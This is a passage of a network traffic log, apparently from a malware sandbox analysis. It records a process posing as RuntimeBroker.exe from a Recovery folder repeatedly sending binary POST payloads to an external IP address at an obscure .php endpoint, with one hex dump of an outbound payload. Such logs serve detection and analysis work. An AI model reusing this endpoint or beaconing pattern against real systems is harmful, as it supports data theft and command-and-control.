                                                                                                  Jan 1, 2025 02:27:22.081331015 CET2504OUTData Raw: 53 5e 5b 57 5a 59 5e 50 5f 5a 5a 53 57 5d 56 55 5f 5c 5d 47 51 50 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^[WZY^P_ZZSW]VU_\]GQPWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(<[5T<Y%U Y,>1<$(+!Z5&6#^+'88_%..="^%#[.6
Jan 1, 2025 02:27:22.430083036 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:22.437249899 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:22 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49755 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:22.567907095 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
Jan 1, 2025 02:27:22.925164938 CET | 2504 | OUT | Data (raw payload)
Jan 1, 2025 02:27:23.278824091 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:23.288275003 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:27:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49756 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:23.411271095 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:27:23.768846035 CET | 2504 | OUT | Data (raw payload)
Jan 1, 2025 02:27:24.112343073 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:24.251940966 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:27:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49757 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:24.380208015 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:27:24.740216970 CET | 2504 | OUT | Data (raw payload)
Jan 1, 2025 02:27:25.090821028 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:25.099436045 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:27:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49758 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:25.240669966 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:27:25.596962929 CET | 2504 | OUT | Data (raw payload)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49759 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:25.618228912 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 1600
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:27:25.971951008 CET | 1600 | OUT | Data (raw payload)
Jan 1, 2025 02:27:26.330538034 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:26.338365078 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:27:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49760 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:25.740540028 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:27:26.097105026 CET | 2504 | OUT | Data (raw payload)
Jan 1, 2025 02:27:26.462671995 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:26.599306107 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:27:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49761 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:26.723139048 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:27:27.081389904 CET | 2504 | OUT | Data (raw payload)
Jan 1, 2025 02:27:27.421133041 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:27.559798956 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:27:27 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49762 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:27.737857103 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:27:28.096937895 CET | 2504 | OUT | Data (raw payload)
Jan 1, 2025 02:27:28.495448112 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:28.653047085 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:27:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49763 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:28.786537886 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:27:29.143850088 CET | 2504 | OUT | Data (raw payload)
Jan 1, 2025 02:27:29.515300035 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:29.653983116 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:27:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49764 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:29.930107117 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:27:30.326685905 CET | 2504 | OUT | Data (raw payload)
Jan 1, 2025 02:27:30.635404110 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:27:30.643574953 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:27:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49765 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:30.794894934 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:27:31.143925905 CET | 2504 | OUT | Data (raw payload)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49766 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:27:31.353368044 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 1600
Expect: 100-continue
Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:31.706341982 CET | 1600 | OUT
                                                                                                  Jan 1, 2025 02:27:32.063597918 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:32.070955038 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:31 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  26 | 192.168.2.4 | 49767 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:31.472045898 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:31.831330061 CET | 2504 | OUT
                                                                                                  Jan 1, 2025 02:27:32.190228939 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:32.324203014 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:32 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  27 | 192.168.2.4 | 49768 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:32.441804886 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:32.800178051 CET | 2504 | OUT
                                                                                                  Jan 1, 2025 02:27:33.174192905 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:33.180530071 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:33 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  28 | 192.168.2.4 | 49769 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:33.380225897 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:33.737597942 CET | 2504 | OUT
                                                                                                  Jan 1, 2025 02:27:34.102540016 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:34.265361071 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:33 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  29 | 192.168.2.4 | 49770 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:34.395034075 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:34.753231049 CET | 2504 | OUT
                                                                                                  Jan 1, 2025 02:27:35.095901012 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:35.104477882 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:34 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  30 | 192.168.2.4 | 49771 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:35.240425110 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:35.597012997 CET | 2504 | OUT
                                                                                                  Jan 1, 2025 02:27:35.940613031 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:36.077573061 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:35 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  31 | 192.168.2.4 | 49772 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:36.211234093 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:36.565721035 CET | 2504 | OUT
                                                                                                  Jan 1, 2025 02:27:36.932197094 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:37.069775105 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:36 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  32 | 192.168.2.4 | 49773 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:37.090503931 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:37.440850019 CET | 1600 | OUT
                                                                                                  Jan 1, 2025 02:27:37.795023918 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:37.802158117 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:37 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  33 | 192.168.2.4 | 49774 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:37.190767050 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:37.550216913 CET | 2504 | OUT
                                                                                                  Jan 1, 2025 02:27:37.943321943 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:38.098577023 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:37 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  34 | 192.168.2.4 | 49775 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:38.226448059 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:38.581341028 CET | 2504 | OUT
                                                                                                  Jan 1, 2025 02:27:38.956531048 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:38.964437962 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:38 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  35 | 192.168.2.4 | 49776 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:39.081208944 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:39.791496038 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:39.799396038 CET  185                IN         HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:39 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                  36          192.168.2.4  49777        185.239.51.56   80                6340  C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                                                  Jan 1, 2025 02:27:39.933752060 CET  295                OUT        POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:40.635924101 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:40.643277884 CET  185                IN         HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:40 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                  37          192.168.2.4  49778        185.239.51.56   80                6340  C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                                                  Jan 1, 2025 02:27:40.769181967 CET  295                OUT        POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:41.470607042 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:41.608418941 CET  185                IN         HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:41 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                  38          192.168.2.4  49779        185.239.51.56   80                6340  C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                                                  Jan 1, 2025 02:27:41.740324974 CET  295                OUT        POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:42.443439960 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:42.450582981 CET  185                IN         HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:42 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                  39          192.168.2.4  49780        185.239.51.56   80                6340  C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                                                  Jan 1, 2025 02:27:42.585196018 CET  295                OUT        POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
